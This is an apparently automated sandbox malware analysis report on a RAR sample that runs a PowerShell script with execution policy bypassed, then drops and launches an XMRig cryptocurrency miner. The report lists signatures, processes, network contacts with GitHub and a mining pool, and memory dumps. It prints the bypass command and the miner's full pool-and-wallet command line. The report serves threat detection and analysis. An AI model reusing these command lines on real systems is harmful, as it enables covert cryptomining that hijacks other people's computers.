Malware Analysis Report

2025-04-19 17:54

Sample ID 240527-ar7bcahf3y
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
execution xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

execution xmrig miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:14

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/3024-4-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmp

memory/3024-5-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/3024-6-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/3024-7-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/3024-8-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/3024-9-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/3024-10-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/3024-11-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/3024-12-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:23

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1144-0-0x00007FFE3E073000-0x00007FFE3E075000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arrr5yhg.hwf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1144-9-0x0000028AF4050000-0x0000028AF4072000-memory.dmp

memory/1144-10-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp

memory/1144-11-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp

memory/1144-12-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp

memory/1144-14-0x0000028AF40F0000-0x0000028AF4102000-memory.dmp

memory/1144-15-0x0000028AF40D0000-0x0000028AF40DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3232-46-0x0000017A76BE0000-0x0000017A76C00000-memory.dmp

memory/3232-47-0x0000017A76C20000-0x0000017A76C40000-memory.dmp

memory/3232-48-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/1144-49-0x00007FFE3E073000-0x00007FFE3E075000-memory.dmp

memory/1144-50-0x00007FFE3E070000-0x00007FFE3EB32000-memory.dmp

memory/3232-51-0x0000017A76C40000-0x0000017A76C60000-memory.dmp

memory/3232-52-0x0000017A76C60000-0x0000017A76C80000-memory.dmp

memory/3232-53-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-54-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-55-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-57-0x0000017A76C60000-0x0000017A76C80000-memory.dmp

memory/3232-56-0x0000017A76C40000-0x0000017A76C60000-memory.dmp

memory/3232-58-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-59-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-60-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-61-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-62-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-63-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-64-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-65-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-66-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-67-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-68-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-69-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-70-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-71-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-72-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-73-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-74-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-75-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-76-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-77-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-78-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-79-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-80-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-81-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-82-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-83-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-84-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-85-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-86-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-87-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-88-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-89-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-90-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-91-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-92-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-93-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-94-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-95-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-96-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-97-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-98-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-99-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-100-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-101-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-102-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-103-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-104-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-105-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-106-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-107-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-108-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-109-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-110-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-111-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-112-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-113-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-114-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-115-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

memory/3232-116-0x00007FF6F23C0000-0x00007FF6F2FF3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:50

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

memory/4524-0-0x00007FFFBA0C3000-0x00007FFFBA0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k32oa2nn.ep3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4524-10-0x00000236D7BB0000-0x00000236D7BD2000-memory.dmp

memory/4524-11-0x00007FFFBA0C0000-0x00007FFFBAB81000-memory.dmp

memory/4524-12-0x00007FFFBA0C0000-0x00007FFFBAB81000-memory.dmp

memory/4524-14-0x00007FFFBA0C0000-0x00007FFFBAB81000-memory.dmp

memory/4524-15-0x00000236D7C60000-0x00000236D7C72000-memory.dmp

memory/4524-16-0x00000236D7BE0000-0x00000236D7BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3244-47-0x000001482CB80000-0x000001482CBA0000-memory.dmp

memory/3244-48-0x000001482CBD0000-0x000001482CBF0000-memory.dmp

memory/3244-49-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/4524-50-0x00007FFFBA0C3000-0x00007FFFBA0C5000-memory.dmp

memory/3244-52-0x000001482CBF0000-0x000001482CC10000-memory.dmp

memory/4524-51-0x00007FFFBA0C0000-0x00007FFFBAB81000-memory.dmp

memory/3244-53-0x000001482CC10000-0x000001482CC30000-memory.dmp

memory/3244-54-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/4524-55-0x00007FFFBA0C0000-0x00007FFFBAB81000-memory.dmp

memory/3244-56-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-58-0x000001482CBF0000-0x000001482CC10000-memory.dmp

memory/3244-57-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-59-0x000001482CC10000-0x000001482CC30000-memory.dmp

memory/3244-60-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-61-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-62-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-63-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-64-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-65-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-66-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-67-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-68-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-69-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-70-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-71-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-72-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-73-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-74-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-75-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-76-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-77-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-78-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-79-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-80-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-81-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-82-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-83-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-84-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-85-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-86-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-87-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-88-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-89-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-90-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-91-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-92-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-93-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-94-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-95-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-96-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-97-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-98-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-99-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-100-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-101-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-102-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-103-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-104-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-105-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-106-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-107-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-108-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-109-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-110-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-111-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-112-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-113-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-114-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-115-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-116-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-117-0x00007FF677400000-0x00007FF678033000-memory.dmp

memory/3244-118-0x00007FF677400000-0x00007FF678033000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
